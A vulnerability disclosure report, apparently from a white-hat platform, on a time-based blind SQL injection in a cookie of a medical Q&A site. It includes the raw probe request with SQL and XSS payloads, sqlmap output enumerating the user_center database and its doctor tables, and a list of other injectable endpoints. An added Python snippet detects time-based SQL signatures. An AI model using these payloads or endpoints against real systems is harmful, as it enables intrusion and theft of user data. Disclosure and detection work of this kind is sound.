2015-10-12: Details reported to the vendor, awaiting vendor action
2015-10-15: Vendor confirmed; details disclosed to the vendor only
2015-10-25: Details disclosed to core white hats and relevant domain experts
2015-11-04: Details disclosed to regular white hats
2015-11-14: Details disclosed to intern white hats
2015-11-29: Details disclosed to the public
A dim street corner, a quiet rainy night; who is calling, like the wind, shattering on the far shore of a dream.
Request:
GET /forget_pwd HTTP/1.1
X-Forwarded-For: 8.8.8.8'
Cookie: __jsluid=a8ad89913c0d4004064d4948aff7eb69; andomain=61db1d43d1e4ab88b0fc66715115b95a; ASKSID=if(now()=sysdate()%2Csleep(0)%2C0)/*'XOR(if(now()=sysdate()%2Csleep(0)%2C0))OR'"XOR(if(now()=sysdate()%2Csleep(0)%2C0))OR"*/; HMACCOUNT=3FFF731E72B1C8DA; CNZZDATA30036369=cnzz_eid%3D1553699147-1444573889-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1444573889; Hm_lvt_8e22e0e9f539749531bf6948e1729842=1444574626,1444574626; Hm_lpvt_8e22e0e9f539749531bf6948e1729842=1444574626; CNZZDATA1000001320=1395883615-1444573135-http%253A%252F%252Fwww.acunetix-referrer.com%252F%7C1444573135; Hm_lvt_7c2c4ab8a1436c0f67383fe9417819b7=1444574626,1444574626,1444574638; Hm_lpvt_7c2c4ab8a1436c0f67383fe9417819b7=1444574638; HMACCOUNT=3FFF731E72B1C8DA; __utmt=1; __utma=266081247.1561387362.1444574626.1444574626.1444574626.1; __utmb=266081247.1.10.1444574626; __utmc=266081247; __utmz=266081247.1444574626.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss")
X-Requested-With: XMLHttpRequest
Referer: http://a.120ask.com/
Host: a.120ask.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
The ASKSID cookie parameter is used without any filtering, which makes it injectable (time-based blind SQL injection).
Two databases; the user_center database contains 122 tables.
Due to time constraints I did not dump any further. Even the table of deleted doctor accounts is there; the rest you can see for yourselves.
web application technology: Nginx
back-end DBMS: MySQL 5.0.12
[00:22:31] [INFO] fetching tables for database: 'user_center'
[00:22:31] [INFO] fetching number of tables for database 'user_center'
[00:22:31] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[00:22:31] [WARNING] time-based comparison requires larger statistical model, please wait..............................
[00:22:35] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
1
[00:23:07] [INFO] adjusting time delay to 1 second due to good response times
22
[00:23:13] [INFO] retrieved: adm
[00:23:55] [ERROR] invalid character detected. retrying..
[00:23:55] [WARNING] increasing time delay to 2 seconds
in_title_1
[00:26:51] [INFO] retrieved: admin_title_2
[00:27:54] [INFO] retrieved: alias_bind_log
[00:31:45] [INFO] retrieved: area_info
[00:34:12] [INFO] retrieved: ask_head
[00:36:12] [INFO] retrieved: base_hospital
[00:39:55] [INFO] retrieved: class_relation
[00:43:51] [INFO] retrieved: doctor_auth_apply
[00:49:11] [INFO] retrieved: doctor_auth_base
[00:50:54] [INFO] retrieved: doctor_auth_t
[00:52:33] [ERROR] invalid character detected. retrying..
[00:52:33] [WARNING] increasing time delay to 3 seconds
ype
[00:54:00] [INFO] retrieved: doctor_auth_type_status
[00:58:41] [INFO] retrieved: doctor_class
[01:01:18] [INFO] retrieved: doctor_del_user
[01:05:23] [INFO] retrieved: doctor_education
[01:09:41] [INFO] retrieved: doctor_ext
[01:11:48] [INFO] retrieved: doctor_fla

(custom) HEADER parameter 'Cookie #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 344 HTTP(s) requests:
---
Parameter: Cookie #1* ((custom) HEADER)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: __jsluid=a8ad89913c0d4004064d4948aff7eb69; andomain=61db1d43d1e4ab88b0fc66715115b95a; ASKSID=if(now()=sysdate(),sleep(0),0)/' AND (SELECT * FROM (SELECT(SLEEP(5)))gusd) AND 'ENhF'='ENhF'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/; HMACCOUNT=3FFF731E72B1C8DA; CNZZDATA30036369=cnzz_eid=1553699147-1444573889-http%3A%2F%2Fwww.acunetix-referrer.com%2F%26ntime=1444573889; Hm_lvt_8e22e0e9f539749531bf6948e1729842=1444574626,1444574626; Hm_lpvt_8e22e0e9f539749531bf6948e1729842=1444574626; CNZZDATA1000001320=1395883615-1444573135-http%3A%2F%2Fwww.acunetix-referrer.com%2F|1444573135; Hm_lvt_7c2c4ab8a1436c0f67383fe9417819b7=1444574626,1444574626,1444574638; Hm_lpvt_7c2c4ab8a1436c0f67383fe9417819b7=1444574638; HMACCOUNT=3FFF731E72B1C8DA; __utmt=1; __utma=266081247.1561387362.1444574626.1444574626.1444574626.1; __utmb=266081247.1.10.1444574626; __utmc=266081247; __utmz=266081247.1444574626.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss")
---
[00:05:06] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5.0.12
[00:05:06] [INFO] fetching database names
[00:05:06] [INFO] fetching number of databases
[00:05:06] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[00:05:06] [INFO] retrieved:
[00:05:06] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
2
[00:05:29] [INFO] retrieved:
[00:05:39] [INFO] adjusting time delay to 2 seconds due to good response times
[00:06:02] [ERROR] invalid character detected. retrying..
[00:06:02] [WARNING] increasing time delay to 3 seconds
info
[00:08:29] [ERROR] invalid character detected. retrying..
[00:08:29] [WARNING] increasing time delay to 4 seconds
rmation_schema
[00:15:57] [INFO] retrieved: user_center
[00:22:11] [ERROR] invalid character detected. retrying..
[00:22:11] [WARNING] increasing time delay to 5 seconds
available databases [2]:
[*] information_schema
[*] user_center
[00:22:12] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\a.120ask.com'
[*] shutting down at 00:22:12
Several other endpoints also read this cookie parameter and are injectable in the same way:
http://a.120ask.com/askregsave
http://a.120ask.com/checking/
http://a.120ask.com/user/ajax_checkcode
http://a.120ask.com/user/reg_checking/
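As an added illustration (not part of the original report), a defender-side check in Python: it parses the Cookie header of a raw request like the one above, percent-decodes every value, and flags cookie names whose value carries a MySQL timing primitive (sleep, benchmark, sysdate, XOR), which is what a log review or WAF rule would look for; it also shows the positive allowlist validation of the session id that would have stopped the ASKSID injection at the edge. The 32-hex-character session-id shape is an assumption, since the report does not state the real format, and the sample request is constructed.

```python
import re
from typing import Dict, List
from urllib.parse import unquote

# Constructed sample request, modelled on the probe in the report: the
# ASKSID cookie carries a MySQL timing payload, the other cookies are benign.
SAMPLE_REQUEST = (
    "GET /forget_pwd HTTP/1.1\r\n"
    "Host: a.120ask.com\r\n"
    "Cookie: __jsluid=a8ad89913c0d4004064d4948aff7eb69; "
    "ASKSID=if(now()=sysdate()%2Csleep(0)%2C0)/*'XOR(if(now()=sysdate()"
    "%2Csleep(0)%2C0))OR'*/; HMACCOUNT=3FFF731E72B1C8DA\r\n"
    "\r\n"
)

# MySQL primitives that appear in time-based blind probes and never in a
# legitimate session identifier. Matched after percent-decoding.
TIME_BASED_SIGNATURES = re.compile(
    r"\bsleep\s*\(|\bbenchmark\s*\(|\bsysdate\s*\(\s*\)|\bxor\s*\(",
    re.IGNORECASE,
)

# Assumed shape of a valid session id (the report does not state it);
# the real check must use whatever format the application issues.
SESSION_ID_ALLOWLIST = re.compile(r"^[0-9a-f]{32}$")


def parse_cookies(request: str) -> Dict[str, str]:
    """Map cookie name -> percent-decoded value from a raw HTTP request."""
    head = request.split("\r\n\r\n", 1)[0]
    cookies: Dict[str, str] = {}
    for line in head.split("\r\n")[1:]:          # skip the request line
        name, _, value = line.partition(":")
        if name.strip().lower() != "cookie":
            continue
        for pair in value.split(";"):
            key, _, val = pair.strip().partition("=")
            if key:
                cookies[key] = unquote(val)
    return cookies


def flag_suspicious_cookies(request: str) -> List[str]:
    """Names of cookies whose value carries a time-based SQLi signature."""
    return sorted(name for name, value in parse_cookies(request).items()
                  if TIME_BASED_SIGNATURES.search(value))


def is_allowlisted_session_id(value: str) -> bool:
    """Positive validation: the actual fix, rather than signature blocking."""
    return SESSION_ID_ALLOWLIST.fullmatch(value) is not None
```

Signature matching is only a detection aid; the allowlist check (or a parameterized query on the server) is what removes the injection.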
Severity: Medium
Vulnerability Rank: 8
Confirmed: 2015-10-15 09:27
Vendor reply: The vulnerability has been confirmed; a gift will be arranged soon.
Fix suggestion: None